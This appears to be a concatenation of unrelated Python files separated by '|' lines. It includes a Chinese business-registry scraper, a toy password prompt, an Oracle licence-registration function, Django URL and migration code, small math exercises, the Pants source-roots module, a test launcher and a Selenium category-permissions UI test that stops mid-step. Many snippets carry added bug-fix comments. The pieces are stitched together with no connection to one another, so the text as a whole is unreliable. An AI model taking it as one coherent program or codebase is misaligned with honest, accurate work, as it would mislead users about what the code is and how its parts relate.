    base_url = 'http://wap.gzaic.gov.cn/Entity/Default.aspx?__ufps={0}'
    corp_url = 'http://wap.gzaic.gov.cn/Entity/show.aspx?id={0}'
    ufps = ''
    data = {
        'btnSearchQy': '查询企业基本信息',
        'txtEntName': '',
        '__EVENTTARGET': '',
        '__EVENTARGUMENT': ''
    }
    opener = Opener(has_cookie=True)
    html = opener.open(base_url, raw_string=False)
    print('************************************************')
    # The __ufps token must be echoed back on the search POST.
    ufps_reg = re.compile(r'__ufps=(?P<__ufps>\d*)')
    search_obj = ufps_reg.search(html)
    if search_obj:
        ufps = search_obj.groups()[0]
        print('__ufps: %s' % ufps)
    else:
        print('__ufps not found!')
        sys.exit()
    register_code = '4401011103185'
    data['txtRegNO'] = register_code
    url = base_url.format(ufps)
    print('************************************************')
    html = opener.open(url, data, raw_string=False)
    print('************************************************')
    ufps = ufps_reg.search(html).groups()[0]
    if html.find('__VIEWSTATE') < 0:
        sys.exit()
    corp_id_reg = re.compile(r'show\.aspx\?id=(?P<id>\d*)"')
    corp_id = ''
    search_obj = corp_id_reg.search(html)
    if search_obj:
        corp_id = search_obj.groups()[0]
        print('corp id: %s' % corp_id)
    else:
        print('Not found corp id!')
        sys.exit()
    url = corp_url.format(corp_id)
    html = opener.open(url, raw_string=False)
    print('************************************************')
    corp_info = {
        'register_code': register_code,
        'status': '登记成立',
        'period': '长期',
    }
    corp_reg = re.compile(r'注册号:(?P<register_code>[^<]*)<br>[^:]*企业名称:(?P<name>[^<]*)<br>[^:]*企业地址:(?P<addr>[^<]*)<br>[^:]*企业状态:[^\n]*<br>[^:]*负责人:(?P<representative>[^<]*)<br>[^:]*企业类型:(?P<nature>[^<]*)<br>[^:]*成立日期:(?P<establishment_data>[^<]*)<br>[^:]*核准日期:[^\n]*<br>[^:]*注册资本:(?P<capital>[^<]*)<br>[^:]*实收资本:[^\n]*<br>[^:]*登记机关:(?P<register_department>[^<]*)<br>[^:]*经营范围:(?P<scope>[^<]*)<br>', re.S)
    search_obj = corp_reg.search(html)
    if search_obj:
        corp_info.update(search_obj.groupdict())
        print(corp_info)
    else:
        print('Not match!')
        # BUG FIX: removed `corp_id = search_obj.groups()[0]` here —
        # on this branch search_obj is None, so the line always raised
        # AttributeError instead of letting the script end cleanly.
|
# Simple interactive gate: keep prompting until the expected user
# supplies the expected password, then announce access.
while True:
    print("Quem es tu? ")
    if input() != 'joao':
        # Wrong user: start over without asking for a password.
        continue
    print("Fala aew Jaum. Qual é o password? ")
    if input() == 'swordfish':
        break
print('Access granted')
|
import sys
import getpass
import os
import random
import cx_Oracle
import datetime
from addperson import *
def driverLicenceRegistration(curs, connection):
    """Interactively register a driving licence for a person.

    Looks up the entered SIN in `people`; if the person exists, confirms
    before proceeding. Prompts for licence details, reads the photo file
    as a BLOB, inserts one row into drive_license and commits on the
    given connection.
    """
    sin = str(input("please input user sin > "))
    # SECURITY FIX: the lookup previously concatenated `sin` straight
    # into the SQL text (injection risk); use a bind variable instead.
    search_str = 'SELECT name FROM people p WHERE p.sin = :sin'
    print(search_str)
    curs.execute(search_str, {'sin': sin})
    result = curs.fetchall()
    print(result)
    if (len(result) == 0):
        n_own = 'y'
        #n_own = input("new sin entered, add new person? (y) or (n) or (e) > ")
        if (n_own == 'e'):
            return  # BUG FIX: was `pass`, which fell through and inserted anyway
    else:
        n_own = input("user found, add vehicle? (y)es or (n)o or (e)xit > ")
        if (n_own == 'e'):
            return  # BUG FIX: was `pass`, which fell through and inserted anyway
    licence_no = input("input licence number > ")
    Dclass = input("input licence class > ")
    photo_name = input("input (photoname).jpg > ")
    issuing_date = input("input issuing date > ")
    expiring_date = input("input expiration date > ")
    # BUG FIX: close the photo file deterministically (it was leaked).
    with open(photo_name, 'rb') as f_image:
        photo = f_image.read()
    # Tell the driver the photo bind is a BLOB. (The original also called
    # setinputsizes positionally with the misspelled `cx_0racle` module
    # name, which raised NameError at runtime.)
    curs.setinputsizes(photo=cx_Oracle.BLOB)
    # BUG FIX: the original attempted the insert twice — an executemany
    # on an undefined `cursInsert`, then an execute whose bind names did
    # not match the SQL (`:class`/`:image` vs dict keys), referenced the
    # undefined `Class`/`image`, and omitted the colon on the last bind.
    # One correct parameterized insert:
    insert = """insert into drive_license(licence_no, sin, class, photo, issuing_date, expiring_date)
                values (:licence_no, :sin, :Dclass, :photo, :issuing_date, :expiring_date)"""
    curs.execute(insert, {'licence_no': licence_no, 'sin': sin,
                          'Dclass': Dclass, 'photo': photo,
                          'issuing_date': issuing_date,
                          'expiring_date': expiring_date})
    # BUG FIX: `connection` was accepted but never used — commit so the
    # row is actually persisted.
    connection.commit()
|
from django.conf.urls.defaults import *
# Quiz app URLconf in pre-Django-1.8 style: views are given as strings
# resolved against the 'quiz.views' prefix. NOTE(review): `patterns()`
# and string view references were removed in Django 1.10; this file must
# be rewritten (list of url()/path() with callables) before upgrading.
urlpatterns = patterns('quiz.views',
url(r'^$', 'quiz_view_all', name='quiz_view_all'),
url(r'^welcome/$', 'quiz_welcome', name='quiz_welcome'),
url(r'^create/$', 'quiz_create', name='quiz_create'),
url(r'^view/(?P<quiz_id>\d+)/$', 'quiz_view', name='quiz_view'),
url(r'^update/(?P<quiz_id>\d+)/$', 'quiz_update', name='quiz_update'),
url(r'^delete/(?P<quiz_id>\d+)/$', 'quiz_delete', name='quiz_delete'),
url(r'^(?P<quiz_id>\d+)/question-new/$', 'question_new', name='question_new'),
url(r'^(?P<quiz_id>\d+)/question-view/(?P<question_id>\d+)$', 'question_view', name='question_view'),
)
|
# Generated by Django 2.2.5 on 2019-10-04 19:04
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: adds the `quantity` column to Cart.
    dependencies = [
        ('carts', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='cart',
            name='quantity',
            # NOTE(review): max_length is ignored on IntegerField (Django
            # emits a system-check warning); harmless in this applied
            # migration, but the model field definition should drop it.
            field=models.IntegerField(default=0, max_length=10),
        ),
    ]
|
from gcd_simple import gcd
def lcm_simple(num1, num2):
    """Return the least common multiple of num1 and num2.

    Uses the identity lcm(a, b) = a*b / gcd(a, b), with integer division
    since gcd(a, b) always divides the product exactly.
    """
    product = num1 * num2
    return product // gcd(num1, num2)
# Quick manual check (original comment was Japanese: "operation check").
a = 6
b = 9
print(lcm_simple(a, b))
lst = [6, 21, 12, 33]
lcm = 1
# Fold lcm_simple over the list to get the lcm of all elements.
for a in lst:
    lcm = lcm_simple(lcm, a)
print(lcm)
|
import math
def Trig(opposite, hypotenuse, adjacent):
    """Report which triangle sides were supplied (value > 0).

    Prints the raw side list and a yes/No flag for each of opposite,
    hypotenuse and adjacent, before and after classification. The actual
    side computation below is still disabled (kept as the original
    commented-out draft).
    """
    list1 = [opposite, hypotenuse, adjacent]
    hypo = 'No'
    oppo = 'No'
    adj = 'No'
    print(list1)
    print(oppo)
    print(hypo)
    print(adj)
    # BUG FIX: the original looped 3 times over an if/elif chain, so only
    # the FIRST positive side ever got flagged (e.g. Trig(20, 30, 0) left
    # hypo as 'No' despite hypotenuse being 30). Each side is independent,
    # so test each one once with its own `if`.
    if opposite > 0:
        oppo = 'yes'
    if hypotenuse > 0:
        hypo = 'yes'
    if adjacent > 0:
        adj = 'yes'
    print(list1)
    print(oppo)
    print(hypo)
    print(adj)
    '''
    if hypo == 'No':
        answer = math.sqrt(list1[0]*list1[0] + list1[1]*list1[1])
        print('Opposite:', list1[0])
        print('Adjacent:', list1[1])
        print('Hypotenuse:', answer)
        print('Hypotenuse:', answer)
    elif hypo == 'yes' and oppo == 'No':
        answer = math.sqrt(list1[0]*list1[0] - list1[1]*list1[1])
        print('Opposite:', answer)
        print('Adjacent:', list1[1])
        print('Hypotenuse:', list1[0])
    elif hypo == 'yes' and oppo == 'yes':
        answer = math.sqrt(list1[1]*list1[1] - list1[0]*list1[0])
        print('Opposite:', list1[0])
        print('Adjacent:', answer)
        print('Hypotenuse:', list1[1])
    '''
Trig(20,30,0)
|
# Print "<n>" for n = i - 5 over i in 1..4 (i.e. <-4> .. <-1>).
for i in range(1, 5):
    # BUG FIX: the original `"<"(i-5)+">"` *called* the string literal
    # (TypeError: 'str' object is not callable); the apparent intent was
    # concatenation, which needs str() around the integer.
    print("<" + str(i - 5) + ">")
from django.views.generic import TemplateView
from generic.mixins import CategoryListMixin
class HowToBuyView(TemplateView, CategoryListMixin):
    # Static "how to buy" page; CategoryListMixin presumably contributes
    # the category list to the template context — TODO confirm.
    template_name = "howtobuy.html"
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import itertools
import logging
import os
from dataclasses import dataclass
from pathlib import PurePath
from typing import Iterable
from pants.build_graph.address import Address
from pants.engine.collection import DeduplicatedCollection
from pants.engine.engine_aware import EngineAwareParameter
from pants.engine.fs import PathGlobs, Paths
from pants.engine.rules import Get, MultiGet, collect_rules, rule
from pants.engine.target import Target
from pants.option.option_types import StrListOption
from pants.option.subsystem import Subsystem
from pants.util.docutil import doc_url
from pants.util.frozendict import FrozenDict
from pants.util.logging import LogLevel
from pants.util.memo import memoized_method
from pants.util.strutil import softwrap
logger = logging.getLogger(__name__)
@dataclass(frozen=True, order=True)
class SourceRoot:
    """A single source root, identified by its buildroot-relative path."""

    # Relative path from the buildroot. Note that a source root at the buildroot
    # is represented as ".".
    path: str
@dataclass(frozen=True)
class OptionalSourceRoot:
    """Result of a source-root lookup; source_root is None when none was found."""

    source_root: SourceRoot | None
class SourceRootError(Exception):
    """An error related to SourceRoot computation."""

    def __init__(self, msg: str):
        # Every source-root error points the user at the docs on defining roots.
        super().__init__(f"{msg}See {doc_url('source-roots')} for how to define source roots.")
class InvalidSourceRootPatternError(SourceRootError):
    """Indicates an invalid pattern was provided.

    Raised when a configured root pattern contains a `..` segment.
    """
class InvalidMarkerFileError(SourceRootError):
    """Indicates an invalid marker file was provided.

    Raised when a marker filename is not a plain base name or contains
    glob/negation characters (`*`, `!`).
    """
class NoSourceRootError(SourceRootError):
    """Indicates we failed to map a source file to a source root."""

    def __init__(self, path: str | PurePath, extra_msg: str = ""):
        # extra_msg lets callers append context about where the path came from.
        super().__init__(f"No source root found for `{path}`. {extra_msg}")
# We perform pattern matching against absolute paths, where "/" represents the repo root.
# (PurePath(os.path.sep) is "/" on POSIX.)
_repo_root = PurePath(os.path.sep)
@dataclass(frozen=True)
class SourceRootPatternMatcher:
    """Matches putative source-root paths against the configured patterns."""

    root_patterns: tuple[str, ...]

    def __post_init__(self) -> None:
        # Patterns that climb out of the buildroot are never valid.
        for candidate in self.root_patterns:
            if ".." in candidate.split(os.path.sep):
                raise InvalidSourceRootPatternError(
                    f"`..` disallowed in source root pattern: {candidate}."
                )

    def get_patterns(self) -> tuple[str, ...]:
        return tuple(self.root_patterns)

    def matches_root_patterns(self, relpath: PurePath) -> bool:
        """Does this putative root match a pattern?"""
        # Anchor the candidate at the virtual repo root "/" so patterns that
        # start with "/" match absolutely.  This is O(#patterns) per call,
        # which is fine for the small pattern lists we expect.
        anchored = PurePath(os.path.sep) / relpath
        return any(anchored.match(pattern) for pattern in self.root_patterns)
class SourceRootConfig(Subsystem):
    """Subsystem exposing the `[source]` options that define source roots."""

    options_scope = "source"
    help = "Configuration for roots of source trees."

    # Built-in patterns covering the most common repo layouts.
    DEFAULT_ROOT_PATTERNS = [
        "/",
        "src",
        "src/python",
        "src/py",
        "src/thrift",
        "src/protobuf",
        "src/protos",
        "src/scala",
        "src/java",
    ]

    root_patterns = StrListOption(
        default=DEFAULT_ROOT_PATTERNS,
        help=softwrap(
            f"""
            A list of source root suffixes.
            A directory with this suffix will be considered a potential source root.
            E.g., `src/python` will match `<buildroot>/src/python`, `<buildroot>/project1/src/python`
            etc.
            Prepend a `/` to anchor the match at the buildroot.
            E.g., `/src/python` will match `<buildroot>/src/python` but not `<buildroot>/project1/src/python`.
            A `*` wildcard will match a single path segment,
            E.g., `src/*` will match `<buildroot>/src/python` and `<buildroot>/src/rust`.
            Use `/` to signify that the buildroot itself is a source root.
            See {doc_url('source-roots')}.
            """
        ),
        advanced=True,
        metavar='["pattern1", "pattern2", ...]',
    )
    marker_filenames = StrListOption(
        help=softwrap(
            """
            The presence of a file of this name in a directory indicates that the directory
            is a source root. The content of the file doesn't matter, and may be empty.
            Useful when you can't or don't wish to centrally enumerate source roots via
            `root_patterns`.
            """
        ),
        advanced=True,
        metavar="filename",
    )

    @memoized_method
    def get_pattern_matcher(self) -> SourceRootPatternMatcher:
        # Memoized: options are immutable for the lifetime of the subsystem,
        # so one matcher instance can be shared by all callers.
        return SourceRootPatternMatcher(self.root_patterns)
@dataclass(frozen=True)
class SourceRootsRequest:
    """Find the source roots for the given files and/or dirs."""

    files: tuple[PurePath, ...]
    dirs: tuple[PurePath, ...]

    def __init__(self, files: Iterable[PurePath], dirs: Iterable[PurePath]) -> None:
        # Frozen dataclass: bypass the setattr guard to normalize inputs into
        # sorted tuples (stable hashing/equality regardless of input order).
        object.__setattr__(self, "files", tuple(sorted(files)))
        object.__setattr__(self, "dirs", tuple(sorted(dirs)))
        # A handwritten __init__ suppresses the generated one, so the
        # validation hook must be invoked explicitly.
        self.__post_init__()

    def __post_init__(self) -> None:
        # Validate every path: must be relative and must not escape upward.
        for candidate in itertools.chain(self.files, self.dirs):
            if ".." in str(candidate).split(os.path.sep):
                raise ValueError(f"SourceRootRequest cannot contain `..` segment: {candidate}")
            if candidate.is_absolute():
                raise ValueError(f"SourceRootRequest path must be relative: {candidate}")

    @classmethod
    def for_files(cls, file_paths: Iterable[str]) -> SourceRootsRequest:
        """Create a request for the source root for the given file."""
        return cls({PurePath(file_path) for file_path in file_paths}, ())
@dataclass(frozen=True)
class SourceRootRequest(EngineAwareParameter):
    """Find the source root for the given path.

    If you have multiple paths, particularly if many of them share parent directories, you'll get
    better performance with a `SourceRootsRequest` (see above) instead.
    """

    path: PurePath

    def __post_init__(self) -> None:
        # Reject upward escapes and absolute paths outright.
        rendered = str(self.path)
        if ".." in rendered.split(os.path.sep):
            raise ValueError(f"SourceRootRequest cannot contain `..` segment: {self.path}")
        if self.path.is_absolute():
            raise ValueError(f"SourceRootRequest path must be relative: {self.path}")

    @classmethod
    def for_file(cls, file_path: str) -> SourceRootRequest:
        """Create a request for the source root for the given file."""
        # A file can never itself be a source root, so start the search at its
        # enclosing directory and save one superfluous check.
        return cls(PurePath(file_path).parent)

    @classmethod
    def for_address(cls, address: Address) -> SourceRootRequest:
        """Create a request for the directory an address lives in."""
        # spec_path is already a directory, so for_file() (which strips the
        # final component) would be wrong here.
        return cls(PurePath(address.spec_path))

    @classmethod
    def for_target(cls, target: Target) -> SourceRootRequest:
        """Create a request for the source root of a target's address."""
        return cls.for_address(target.address)

    def debug_hint(self) -> str:
        return str(self.path)
@dataclass(frozen=True)
class SourceRootsResult:
    """Maps each requested path to the SourceRoot it falls under."""

    path_to_root: FrozenDict[PurePath, SourceRoot]
@dataclass(frozen=True)
class OptionalSourceRootsResult:
    """Like SourceRootsResult, but entries may wrap a None source root."""

    path_to_optional_root: FrozenDict[PurePath, OptionalSourceRoot]
@rule
async def get_optional_source_roots(
    source_roots_request: SourceRootsRequest,
) -> OptionalSourceRootsResult:
    """Rule to request source roots that may not exist."""
    # A file cannot be a source root, so request for its parent.
    # In the typical case, where we have multiple files with the same parent, this can
    # dramatically cut down on the number of engine requests.
    dirs: set[PurePath] = set(source_roots_request.dirs)
    file_to_dir: dict[PurePath, PurePath] = {
        file: file.parent for file in source_roots_request.files
    }
    dirs.update(file_to_dir.values())
    roots = await MultiGet(Get(OptionalSourceRoot, SourceRootRequest(d)) for d in dirs)
    # NOTE: zip() pairs results positionally, relying on `dirs` iterating in
    # the same order here as when the MultiGet generator consumed it; a set's
    # iteration order is stable within a single run, so this pairing holds.
    dir_to_root = dict(zip(dirs, roots))
    # Map every originally requested path (dir or file) to its dir's root.
    path_to_optional_root: dict[PurePath, OptionalSourceRoot] = {}
    for d in source_roots_request.dirs:
        path_to_optional_root[d] = dir_to_root[d]
    for f, d in file_to_dir.items():
        path_to_optional_root[f] = dir_to_root[d]
    return OptionalSourceRootsResult(path_to_optional_root=FrozenDict(path_to_optional_root))
@rule
async def get_source_roots(source_roots_request: SourceRootsRequest) -> SourceRootsResult:
    """Convenience rule to allow callers to request SourceRoots that must exist.

    That way callers don't have to unpack OptionalSourceRoots if they know they expect a SourceRoot
    to exist and are willing to error if it doesn't.
    """
    osrr = await Get(OptionalSourceRootsResult, SourceRootsRequest, source_roots_request)
    path_to_root = {}
    for path, osr in osrr.path_to_optional_root.items():
        # Any path that failed to resolve is a hard error for this rule.
        if osr.source_root is None:
            raise NoSourceRootError(path)
        path_to_root[path] = osr.source_root
    return SourceRootsResult(path_to_root=FrozenDict(path_to_root))
@rule
async def get_optional_source_root(
    source_root_request: SourceRootRequest, source_root_config: SourceRootConfig
) -> OptionalSourceRoot:
    """Rule to request a SourceRoot that may not exist."""
    pattern_matcher = source_root_config.get_pattern_matcher()
    path = source_root_request.path
    # Check if the requested path itself is a source root.
    # A) Does it match a pattern?
    if pattern_matcher.matches_root_patterns(path):
        return OptionalSourceRoot(SourceRoot(str(path)))
    # B) Does it contain a marker file?
    marker_filenames = source_root_config.marker_filenames
    if marker_filenames:
        # Marker filenames must be plain base names: no directories or globs.
        for marker_filename in marker_filenames:
            if (
                os.path.basename(marker_filename) != marker_filename
                or "*" in marker_filename
                or "!" in marker_filename
            ):
                raise InvalidMarkerFileError(
                    f"Marker filename must be a base name: {marker_filename}"
                )
        paths = await Get(Paths, PathGlobs([str(path / mf) for mf in marker_filenames]))
        if len(paths.files) > 0:
            return OptionalSourceRoot(SourceRoot(str(path)))
    # The requested path itself is not a source root, but maybe its parent is.
    # Recurse upward; "." (the buildroot) terminates the search.
    if str(path) != ".":
        return await Get(OptionalSourceRoot, SourceRootRequest(path.parent))
    # The requested path is not under a source root.
    return OptionalSourceRoot(None)
@rule
async def get_source_root(source_root_request: SourceRootRequest) -> SourceRoot:
    """Convenience rule to allow callers to request a SourceRoot directly.

    That way callers don't have to unpack an OptionalSourceRoot if they know they expect a
    SourceRoot to exist and are willing to error if it doesn't.
    """
    optional_source_root = await Get(OptionalSourceRoot, SourceRootRequest, source_root_request)
    # No root found: surface a hard error rather than returning None.
    if optional_source_root.source_root is None:
        raise NoSourceRootError(source_root_request.path)
    return optional_source_root.source_root
class AllSourceRoots(DeduplicatedCollection[SourceRoot]):
    """All source roots that exist in the repository, deduplicated."""

    # Sort for stable, reproducible ordering of the collection.
    sort_input = True
@rule(desc="Compute all source roots", level=LogLevel.DEBUG)
async def all_roots(source_root_config: SourceRootConfig) -> AllSourceRoots:
    """Find every source root that actually exists on disk."""
    source_root_pattern_matcher = source_root_config.get_pattern_matcher()
    # Create globs corresponding to all source root patterns.
    pattern_matches: set[str] = set()
    for path in source_root_pattern_matcher.get_patterns():
        if path == "/":
            # The buildroot itself is a root, so every directory is a candidate.
            pattern_matches.add("**")
        elif path.startswith("/"):
            # Anchored pattern: match only directly under the buildroot.
            pattern_matches.add(f"{path[1:]}/")
        else:
            pattern_matches.add(f"**/{path}/")
    # Create globs for any marker files.
    marker_file_matches: set[str] = set()
    for marker_filename in source_root_config.marker_filenames:
        marker_file_matches.add(f"**/{marker_filename}")
    # Match the patterns against actual files, to find the roots that actually exist.
    pattern_paths, marker_paths = await MultiGet(
        Get(Paths, PathGlobs(globs=sorted(pattern_matches))),
        Get(Paths, PathGlobs(globs=sorted(marker_file_matches))),
    )
    responses = await MultiGet(
        itertools.chain(
            (Get(OptionalSourceRoot, SourceRootRequest(PurePath(d))) for d in pattern_paths.dirs),
            # We don't technically need to issue a SourceRootRequest for the marker files,
            # since we know that their immediately enclosing dir is a source root by definition.
            # However we may as well verify this formally, so that we're not replicating that
            # logic here.
            (Get(OptionalSourceRoot, SourceRootRequest(PurePath(f))) for f in marker_paths.files),
        )
    )
    all_source_roots = {
        response.source_root for response in responses if response.source_root is not None
    }
    return AllSourceRoots(all_source_roots)
def rules():
    """Register this module's @rule functions with the engine."""
    return collect_rules()
|
#!/usr/bin/env python
__author__ = 'zhengandy'

import os
import sys
from argparse import ArgumentParser

# Make sibling modules importable by adding this script's directory.
# The original used sys.path.extend(<str>), which appends each *character*
# of the path string as a separate sys.path entry; append() is correct.
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
print(os.path.dirname(os.path.abspath(__file__)))

ap = ArgumentParser(
    description='xiaowang api unittest',
)
# Optional positional: index of the test item to run; -1 means "all".
ap.add_argument('number', action="store", type=int, nargs='?', default=-1)
args = ap.parse_args()

# Expose the selected test item to the test-case module via the environment
# before importing it (the import below reads UT_ITEM at module load time —
# presumably; verify against MileStone4TestCase).
os.environ.setdefault('UT_ITEM', str(args.number))

from MileStone4TestCase import testRunner
from MileStone4TestCase import TestCase
testRunner.main()
import time, pytest,sys,os
sys.path.insert(1,os.path.abspath(os.path.join(os.path.dirname( __file__ ),'..','..','lib')))
from clsCommon import Common
import clsTestService
import enums
from localSettings import *
import localSettings
from utilityTestFunc import *
class Test:
    """UI test 719: enable/disable 'Inherit permissions' on a sub category."""
    #================================================================================================================================
    # @Author: Michal Zomper
    # Test Name: Categories - Enable / Disable Inherit permissions
    # Test description:
    # create 2 categories, 1 parent and 1 sub category
    # Add member with different permissions to parent category
    # 1. Go so sub category member tab and click on 'Inherit permissions from parent category' -> Click on 'Yes' in the pop-up message
    # All the parent category's members are added to the sub category according to their permissions there.
    # You should Not be able to edit the member's permissions or to remove them or to add new members as long as the inherit option is checked.
    #
    # 2. Go so sub category member tab and UnCheck the option : 'Inherit permissions from parent category' - > Click on 'Yes' in the pop-up message
    # The parent category's members should be removed from the category.
    # The members list should be as it was before the inheriting.
    #================================================================================================================================
    testNum = "719"
    supported_platforms = clsTestService.updatePlatforms(testNum)
    status = "Pass"
    # NOTE(review): 'accured' looks like a typo for 'occurred' — kept as-is
    # because external tooling may read this attribute name/value.
    timeout_accured = "False"
    driver = None
    common = None
    # Test variables
    parentCategoryName = None
    subCategoryName = None
    description = "description"
    tags = "tags,"
    userName1 = "Automation_User_1"
    userName2 = "Automation_User_2"
    userName3 = "Automation_User_3"
    userName4 = "Automation_User_4"

    #run test as different instances on all the supported platforms
    @pytest.fixture(scope='module',params=supported_platforms)
    def driverFix(self,request):
        # Parametrized fixture: one test instance per supported platform.
        return request.param

    def test_01(self,driverFix,env):
        #write to log we started the test
        logStartTest(self,driverFix)
        try:
            ############################# TEST SETUP ###############################
            #capture test start time
            self.startTime = time.time()
            #initialize all the basic vars and start playing
            # NOTE(review): initializeAndLoginAsUser appears to return a
            # (self, driver) pair; rebinding the local name 'self' here is
            # unusual — confirm this is intentional in clsTestService.
            self,self.driver = clsTestService.initializeAndLoginAsUser(self, driverFix)
            self.common = Common(self.driver)
            # Unique category names per run (GUID suffix avoids collisions).
            self.parentCategoryName = clsTestService.addGuidToString('Category - Inherit permissions', self.testNum)
            self.subCategoryName = clsTestService.addGuidToString('Sub Category - Inherit permissions', self.testNum)
            # Three members with distinct permission levels in the parent.
            self.membersList =[(self.userName1,enums.CategoryMemberPermission.MEMBER),
                (self.userName2,enums.CategoryMemberPermission.MODERATOR),
                (self.userName3,enums.CategoryMemberPermission.CONTRIBUTOR)]
            ########################## TEST STEPS - MAIN FLOW ######################
            writeToLog("INFO","Step 1: Going to create parent category")
            self.common.apiClientSession.startCurrentApiClientSession()
            parentId = self.common.apiClientSession.getParentId('galleries')
            if self.common.apiClientSession.createCategory(parentId, localSettings.LOCAL_SETTINGS_LOGIN_USERNAME, self.parentCategoryName, self.description) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 1: FAILED to create parent category")
                return
            writeToLog("INFO","Step 2: Going to create sub category")
            self.common.apiClientSession.startCurrentApiClientSession()
            parentId = self.common.apiClientSession.getCategoryByName(self.parentCategoryName)
            if self.common.apiClientSession.createCategory(parentId, localSettings.LOCAL_SETTINGS_LOGIN_USERNAME, self.subCategoryName, self.description) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 2: FAILED to create sub category")
                return
            writeToLog("INFO","Step 3: Going to clear cache")
            if self.common.admin.clearCache() == False:
                self.status = "Fail"
                writeToLog("INFO","Step 3: FAILED to clear cache")
                return
            writeToLog("INFO","Step 4: Going navigate to home page")
            if self.common.home.navigateToHomePage(forceNavigate=True) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 4: FAILED navigate to home page")
                return
            writeToLog("INFO","Step 5: Going to add members to parent category")
            if self.common.category.addMembersToCategory(self.parentCategoryName, self.membersList) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 5: FAILED to add members to parent category")
                return
            writeToLog("INFO","Step 6: Going navigate to sub category edit page")
            if self.common.category.navigateToEditSubCategoryPage(self.parentCategoryName, self.subCategoryName) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 6: FAILED navigate to sub category edit page")
                return
            writeToLog("INFO","Step 7: Going to inherit permissions from parent category")
            if self.common.category.inheritPermissionsFormCategory() == False:
                self.status = "Fail"
                writeToLog("INFO","Step 7: FAILED to inherit permissions from parent category")
                return
            sleep(3)
            writeToLog("INFO","Step 8: Going navigate to sub category edit page")
            # NOTE(review): 'forcrNavigate' looks like a typo for
            # 'forceNavigate' — verify against the navigateToEditSubCategoryPage API.
            if self.common.category.navigateToEditSubCategoryPage(self.parentCategoryName, self.subCategoryName, forcrNavigate=True) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 8: FAILED navigate to sub category edit page")
                return
            writeToLog("INFO","Step 9: Going to verify that inherit members form parent category display in sub category member tab after inherit")
            if self.common.category.verifyMembersPermissionsInMemberTable(self.membersList) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 9: FAILED to verify that add members form parent category display in sub category member tab after inherit permissions")
                return
            # Steps 10-13 are negative checks: while inheritance is on, member
            # management actions are expected to FAIL (hence '== True' fails the test).
            writeToLog("INFO","Step 10: Going to try to delete member")
            if self.common.channel.deleteChannelMember(self.userName2) == True:
                self.status = "Fail"
                writeToLog("INFO","Step 10: FAILED, user delete member although after inherit members permissions user can NOT delete member")
                return
            writeToLog("INFO","Step 10: preview step failed as expected: user can NOT delete members after inherit members permissions")
            sleep(3)
            writeToLog("INFO","Step 11: Going to try and add member to sub category")
            if self.common.category.addMemberToCategory(self.subCategoryName, self.userName2, permission=enums.CategoryMemberPermission.MEMBER, forceNavigate=False) == True:
                self.status = "Fail"
                writeToLog("INFO","Step 11: FAILED, user added member to sub category although after inherit members permissions user can NOT add member ")
                return
            writeToLog("INFO","Step 11: preview step failed as expected: user can NOT add members after inherit members permissions")
            sleep(3)
            writeToLog("INFO","Step 12: Going to try and change member permission")
            if self.common.category.editCategoryMemberPermission(self.userName1, permission = enums.CategoryMemberPermission.MODERATOR) == True:
                self.status = "Fail"
                writeToLog("INFO","Step 12: FAILED, user change member permission although after inherit members permissions user can NOT change member permission")
                return
            writeToLog("INFO","Step 12: preview step failed as expected: user can NOT change member permission after inherit members permissions")
            sleep(3)
            writeToLog("INFO","Step 13: Going to try and set member as owner")
            if self.common.channel.setChannelMemberAsOwner(self.userName3) == True:
                self.status = "Fail"
                writeToLog("INFO","Step 13: FAILED, user set member as owner although after inherit members permissions user can NOT set member as owner")
                return
            writeToLog("INFO","Step 13: preview step failed as expected: user can NOT set member as owner after inherit members permissions")
            sleep(3)
            writeToLog("INFO","Step 14: Going navigate to sub category edit page")
            if self.common.category.navigateToEditSubCategoryPage(self.parentCategoryName, self.subCategoryName) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 14: FAILED navigate to sub category edit page")
                return
            writeToLog("INFO","Step 15: Going to disable inherit permissions from parent category")
            # Same toggle as step 7: calling it again un-checks inheritance.
            if self.common.category.inheritPermissionsFormCategory() == False:
                self.status = "Fail"
                writeToLog("INFO","Step 15: FAILED to disable inherit permissions from parent category")
                return
            writeToLog("INFO","Step 16: Going navigate to sub category edit page")
            if self.common.category.navigateToEditSubCategoryPage(self.parentCategoryName, self.subCategoryName) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 16: FAILED navigate to sub category edit page")
                return
            writeToLog("INFO","Step 17: Going navigate to sub category member tab")
            if self.common.category.navigateToCategoryMembersTab() == False:
                self.status = "Fail"
                writeToLog("INFO","Step 17: FAILED navigate to sub category member tab")
                return
            # Steps 18-20: after disabling inheritance, the inherited members
            # must no longer appear, so the verifications are expected to fail.
            writeToLog("INFO","Step 18: Going to verify that inherit member '" + self.userName1 + "' form parent category erased from sub category member tab after disable inherit permissions")
            if self.common.category.verifyMemberPermissionsInMemberTable(self.userName1,enums.CategoryMemberPermission.MEMBER)== True:
                self.status = "Fail"
                writeToLog("INFO","Step 18: FAILED, member '" + self.userName1 + "' still display in sub category member tab after disable inherit permissions")
                return
            writeToLog("INFO","Step 18: preview step failed as expected: user doesn't need to a member in sub category after disable inherit members permissions")
            writeToLog("INFO","Step 19: Going to verify that inherit member '" + self.userName2 + "' form parent category erased from sub category member tab after disable inherit permissions")
            if self.common.category.verifyMemberPermissionsInMemberTable(self.userName2,enums.CategoryMemberPermission.MODERATOR)== True:
                self.status = "Fail"
                writeToLog("INFO","Step 19: FAILED, member '" + self.userName2 + "' still display in sub category member tab after disable inherit permissions")
                return
            writeToLog("INFO","Step 19: preview step failed as expected: user doesn't need to a member in sub category after disable inherit members permissions")
            writeToLog("INFO","Step 20: Going to verify that inherit member '" + self.userName3 + "' form parent category erased from sub category member tab after disable inherit permissions")
            if self.common.category.verifyMemberPermissionsInMemberTable(self.userName3,enums.CategoryMemberPermission.CONTRIBUTOR)== True:
                self.status = "Fail"
